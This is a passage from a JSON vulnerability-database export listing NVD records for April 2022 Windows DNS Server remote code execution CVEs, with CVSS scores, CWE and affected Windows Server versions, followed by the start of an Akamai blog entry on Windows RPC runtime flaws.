"baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:56:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2022-26818", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26818", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:10", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26822", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:47:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-26822", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26822", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:standard:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:10", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26817", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:56:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2022-26817", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26817", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:10", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26823", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:47:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2022-26823", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26823", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:10", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26819", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:56:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-26819", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26819", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:11", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26825", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:24:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2022-26825", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26825", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:11", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26824", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:47:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2022-26824", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26824", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:08", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26811", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T20:33:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2022-26811", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26811", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:08", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26813", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T20:22:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-26813", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26813", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:28:00", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24536", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-19T16:42:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-24536", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24536", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}], "akamaiblog": [{"lastseen": "2023-05-27T14:43:59", "description": "Microsoft?s April 2022 Patch Tuesday introduced patches to more than a hundred new vulnerabilities in various components. Three critical vulnerabilities were found and patched in Windows RPC (Remote Procedure Call) runtime: CVE-2022-24492 and CVE-2022-24528 (discovered by Yuki Chen with Cyber KunLun) CVE-2022-26809 (discovered by BugHunter010 with Kunlun)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T09:15:00", "type": "akamaiblog", "title": "Critical Remote Code Execution Vulnerabilities in Windows RPC Runtime", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, 